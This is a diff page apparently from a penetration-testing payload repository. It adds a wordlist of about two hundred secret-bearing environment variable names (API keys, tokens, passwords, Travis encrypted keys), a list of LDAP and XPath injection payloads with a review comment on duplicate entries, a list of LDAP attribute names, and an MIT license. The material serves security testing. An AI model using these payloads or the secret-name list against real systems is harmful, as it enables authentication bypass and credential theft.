GREN_GITHUB_TOKEN=
DRIVER_NAME=
CLOUDFLARE_EMAIL=
CLOUDFLARE_CREVIERA_ZONE_ID=
CLOUDFLARE_API_KEY=
rI=
pHCbGBA8L7a4Q4zZihD3HA=
nexusUsername=
nexusPassword=
mRFSU97HNZZVSvAlRxyYP4Xxx1qXKfRXBtqnwVJqLvK6JTpIlh4WH28ko=
encrypted_fee8b359a955_key=
encrypted_fee8b359a955_iv=
encrypted_6d56d8fe847c_key=
encrypted_6d56d8fe847c_iv=
aX5xTOsQFzwacdLtlNkKJ3K64=
TEST_TEST=
TESCO_API_KEY=
RELEASE_TOKEN=
NUGET_KEY=
NON_TOKEN=
GIT_COMMITTER_NAME=
GIT_AUTHOR_NAME=
CN_SECRET_ACCESS_KEY=
CN_ACCESS_KEY_ID=
0VIRUSTOTAL_APIKEY=
0PUSHOVER_USER=
0PUSHOVER_TOKEN=
0HB_CODESIGN_KEY_PASS=
0HB_CODESIGN_GPG_PASS=
0GITHUB_TOKEN=
nexusUrl=
jxoGfiQqqgvHtv4fLzI=
gpg.passphrase=
encrypted_b1fa8a2faacf_key=
encrypted_b1fa8a2faacf_iv=
encrypted_98ed7a1d9a8c_key=
encrypted_98ed7a1d9a8c_iv=
VIP_GITHUB_DEPLOY_KEY_PASS=
TEAM_EMAIL=
SACLOUD_API=
SACLOUD_ACCESS_TOKEN_SECRET=
SACLOUD_ACCESS_TOKEN=
PANTHEON_SITE=
LEANPLUM_KEY=
LEANPLUM_APP_ID=
FIREBASE_KEY=
CONVERSATION_URL=
BLhLRKwsTLnPm8=
B2_BUCKET=
B2_APP_KEY=
B2_ACCT_ID=
-Dgpg.passphrase=
YT_CLIENT_SECRET=
YT_CLIENT_ID=
WVNmZ40V1Lt0DYC2c6lzWwiJZFsQIXIRzJcubcwqKRoMelkbmKHdeIk=
TRV=
TEST_GITHUB_TOKEN=
RANDRMUSICAPIACCESSTOKEN=
NQc8MDWYiWa1UUKW1cqms=
MY_SECRET_ENV=
FDfLgJkS3bKAdAU24AS5X8lmHUJB94=
COVERALLS_SERVICE_NAME=
CONSUMERKEY=
CLU_REPO_URL=
--closure_entry_point=
gradle.publish.secret=
gradle.publish.key=
ggFqFEKCd54gCDasePLTztHeC4oL104iaQ=
encrypted_12c8071d2874_key=
encrypted_12c8071d2874_iv=
encrypted_0fba6045d9b0_key=
encrypted_0fba6045d9b0_iv=
dv3U5tLUZ0=
UAusaB5ogMoO8l2b773MzgQeSmrLbExr9BWLeqEfjC2hFgdgHLaQ=
PASS=
MONGOLAB_URI=
GITHUB_TOKENS=
FLASK_SECRET_KEY=
DB_PW=
CC_TEST_REPOTER_ID=
8FWcu69WE6wYKKyLyHB4LZHg=
zfp2yZ8aP9FHSy5ahNjqys4FtubOWLk=
rBezlxWRroeeKcM2DQqiEVLsTDSyNZV9kVAjwfLTvM=
hpmifLs=
fR457Xg1zJIz2VcTD5kgSGAPfPlrYx2xnR5yILYiaWiLqQ1rhFKQZ0rwOZ8Oiqk8nPXkSyXABr9B8PhCFJGGKJIqDI39Qe6XCXAN3GMH2zVuUDfgZCtdQ8KtM1Qg71IR4g=
encrypted_932b98f5328a_key=
encrypted_932b98f5328a_iv=
encrypted_31d215dc2481_key=
encrypted_31d215dc2481_iv=
encrypted_1db1f58ddbaf_key=
encrypted_1db1f58ddbaf_iv=
WATSON_CONVERSATION_WORKSPACE=
WATSON_CONVERSATION_USERNAME=
WATSON_CONVERSATION_PASSWORD=
SOUNDCLOUD_USERNAME=
SOUNDCLOUD_PASSWORD=
SOUNDCLOUD_CLIENT_SECRET=
SOUNDCLOUD_CLIENT_ID=
SDM4=
PARSE_JS_KEY=
PARSE_APP_ID=
NON_MULTI_WORKSPACE_SID=
NON_MULTI_WORKFLOW_SID=
NON_MULTI_DISCONNECT_SID=
NON_MULTI_CONNECT_SID=
NON_MULTI_BOB_SID=
NON_MULTI_ALICE_SID=
MULTI_WORKSPACE_SID=
MULTI_WORKFLOW_SID=
MULTI_DISCONNECT_SID=
MULTI_CONNECT_SID=
MULTI_BOB_SID=
MULTI_ALICE_SID=
GHB_TOKEN=
GCR_USERNAME=
GCR_PASSWORD=
BROWSERSTACK_USE_AUTOMATE=
AUTH_TOKEN=
0NC6O0ThWq69BcWmrtbD2ev0UDivbG8OQ1ZsSDm9UqVA=
&query=
xsixFHrha3gzEAwa1hkOw6kvzR4z9dx0XmpvORuo1h4Ag0LCxAR70ZueGyStqpaXoFmTWB1z0WWwooAd0kgDwMDSOcH60Pv4mew=
username=
ted_517c5824cb79_iv=
s3_secret_key=
s3_access_key=
n8awpV01A2rKtErnlJWVzeDK5WfLBaXUvOoc=
encrypted_f383df87f69c_key=
encrypted_f383df87f69c_iv=
encrypted_997071d05769_key=
encrypted_997071d05769_iv=
encrypted_671b00c64785_key=
encrypted_671b00c64785_iv=
encrypted_3761ed62f3dc_key=
encrypted_3761ed62f3dc_iv=
branch=
_8382f1c42598_iv=
_02ddd67d5586_key=
YANGSHUN_GH_PASSWORD=
Y8=
XJ7lElT4Jt9HnUw=
VIP_TEST=
USE_SSH=
SOMEVAR=
PROD_USERNAME=
PROD_PASSWORD=
ORG_GRADLE_PROJECT_cloudinary.url=
N=
LOGNAME=
I6SEeHdMJwAvqM6bNXQaMJwJLyZHdAYK9DQnY=
HAB_KEY=
HAB_AUTH_TOKEN=
GPG_EXECUTABLE=
GK_LOCK_DEFAULT_BRANCH=
GIT_USER=
F97qcq0kCCUAlLjAoyJg=
DB_USERNAME=
DB_PASSWORD=
DB_DATABASE=
DB_CONNECTION=
CONEKTA_APIKEY=
CLAIMR_DB=
BROWSERSTACK_BUILD=
AiYPFLTRxoiZJ9j0bdHjGOffCMvotZhtc9xv0VXVijGdHiIM=
ANALYTICS=
A=
?account=
6mSMEHIauvkenQGZlBzkLYycWctGml9tRnIpbqJwv0xdrkTslVwDQU5IEJNZiTlJ2tYl8og=
1ewh8kzxY=
0KNAME=
-e=
&password=

File diff suppressed because one or more lines are too long

6747
JSON Web Token/index.html Normal file

File diff suppressed because one or more lines are too long

6055
Java RMI/index.html Normal file

File diff suppressed because one or more lines are too long

6479
Kubernetes/index.html Normal file

File diff suppressed because one or more lines are too long


@ -0,0 +1,46 @@
*
*)(&
*))%00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
(
)
)(cn=))\x00
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
/
//
//*
@*
x' or name()='username' or 'x'='y
|
*()|&'
admin*
admin*)((|userpassword=*)
*)(uid=*))(|(uid=*
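Review bot: The last fourteen entries of this list, from the second `*(|(mail=*))` down to the final `*)(uid=*))(|(uid=*`, repeat strings already present in the first nineteen lines, so roughly a third of the file adds requests without adding coverage; the list should be deduplicated. `x' or name()='username' or 'x'='y` is XPath syntax rather than an LDAP filter fragment and would sit better with the XPath material. `)(cn=))\x00` uses a backslash escape where the earlier `*))%00` uses percent-encoding, so it presumably reaches the target as four literal characters unless the consuming tool decodes it. Since a wordlist has no comment syntax, the expected decoding belongs in the accompanying documentation. The file's path is not shown on this page.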


@ -0,0 +1,27 @@
c
cn
co
commonName
dc
facsimileTelephoneNumber
givenName
gn
homePhone
id
jpegPhoto
l
mail
mobile
name
o
objectClass
ou
owner
pager
password
sn
st
surname
uid
username
userPassword

6080
LDAP Injection/index.html Normal file

File diff suppressed because one or more lines are too long

21
LICENSE Normal file

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2019 Swissky
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

5887
LaTeX Injection/index.html Normal file

File diff suppressed because one or more lines are too long

Some files were not shown because too many files have changed in this diff Show More